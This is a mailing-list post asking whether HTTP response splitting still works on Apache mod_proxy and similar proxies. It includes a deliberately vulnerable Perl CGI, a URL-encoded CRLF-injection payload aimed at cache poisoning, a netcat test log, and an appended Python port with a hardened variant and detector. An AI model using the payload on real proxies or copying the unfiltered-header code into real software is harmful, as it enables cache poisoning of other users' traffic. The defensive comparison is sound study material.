Http splitting working example



Hi list.

Hope somebody will spend some time on my question :),
or point me to the right list.

Does HTTP splitting still work in fresh versions of common applications
(squid, apache)?

I've written a sample application (CGI script) vulnerable to it; however,
apache mod_proxy just ignores the answer and initiates a new
connection for each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
# the 'name' parameter is copied into the Location header unfiltered
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attempt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html> HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea of exploiting HTTP splitting. Is
it some kind of new protection feature in apache mod_cache?
Please, could anybody provide a brief description of common
applications on which the attack is working? It seems vendors have done a
great job (like filtering characters in PHP headers, or Tomcat).

--
Best regards.
Gleb Pakharenko.
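Added example, not code from the original post: the redirect from the CGI above ported to Python, once as posted and once with the CR/LF check on header values that the poster credits PHP and Tomcat with, plus a small check that counts status lines smuggled into a CGI header block. The 'name' value is the URL-encoded payload from the post, embedded as constructed input; nothing is sent over the network.

```python
from urllib.parse import unquote
import re

# A CR, LF or NUL inside a header value lets the client inject extra
# header lines, or a whole second response, into the output stream.
_BAD_CHARS = re.compile(r"[\r\n\0]")

# Constructed input: the 'name' query value from the post, still URL-encoded.
POSTED_NAME = ("Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0a"
               "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0a"
               "Content-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>")


def vulnerable_redirect(name: str) -> str:
    """Port of the Perl CGI: the decoded parameter goes straight into Location."""
    return "Status: 302 Moved\nLocation: " + unquote(name) + "\n\n"


def hardened_redirect(name: str) -> str:
    """Same redirect, but refuse (rather than silently strip) control characters."""
    location = unquote(name)
    if _BAD_CHARS.search(location):
        raise ValueError("refusing header value containing CR/LF/NUL")
    return "Status: 302 Moved\r\nLocation: " + location + "\r\n\r\n"


def injected_status_lines(header_block: str) -> int:
    """Count HTTP status lines found inside a CGI header block.

    A correct block has none (the server builds the status line from
    'Status:'), so any hit means a second response was smuggled in.
    """
    return sum(1 for line in header_block.splitlines()
               if re.match(r"HTTP/1\.[01] \d{3}", line))


if __name__ == "__main__":
    print(injected_status_lines(vulnerable_redirect("Foo")))        # 0
    print(injected_status_lines(vulnerable_redirect(POSTED_NAME)))  # 1
    try:
        hardened_redirect(POSTED_NAME)
    except ValueError as exc:
        print("blocked:", exc)
```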



